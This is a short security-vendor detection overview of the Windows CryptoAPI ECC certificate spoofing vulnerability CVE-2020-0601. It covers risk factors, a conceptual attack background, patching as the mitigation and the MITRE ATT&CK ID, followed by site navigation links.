DETECTION OVERVIEW

Windows CryptoAPI ECC Validation Vulnerability - CVE-2020-0601

Risk Factors

Any unpatched Windows application with CryptoAPI automatically validates spoofed certificates. An attacker can create a spoofed certificate by inserting unknown explicit curve parameters into an intermediate certificate. Clients that validate a spoofed certificate can be exposed to machine-in-the-middle (MITM) attacks.

Kill Chain

Exploitation

Risk Score

Attack Background

CryptoAPI, the Windows application programming interface for validating certificates, has a vulnerability that enables an attacker to spoof an intermediate certificate within a certificate chain. Specifically, the attacker generates a private key and ECC parameter set, which enables them to generate a public key that matches a cached certificate. Windows trusts the certificate based on a public key match, and does not fully validate the ECC parameters of all certificates saved in cache.

Mitigation Options

Install relevant patches for affected Windows servers, appliances, endpoints, and proxies that perform TLS validation

MITRE ATT&CK ID

T1557

Professional Services

Partners

Partner Login

Partner Finder

View All Use Cases

View All Industries

View All Integrations

Attack Background

Mitigation Options

MITRE ATT&CK ID

What else can RevealX do for you?

View our Periodic Table of use cases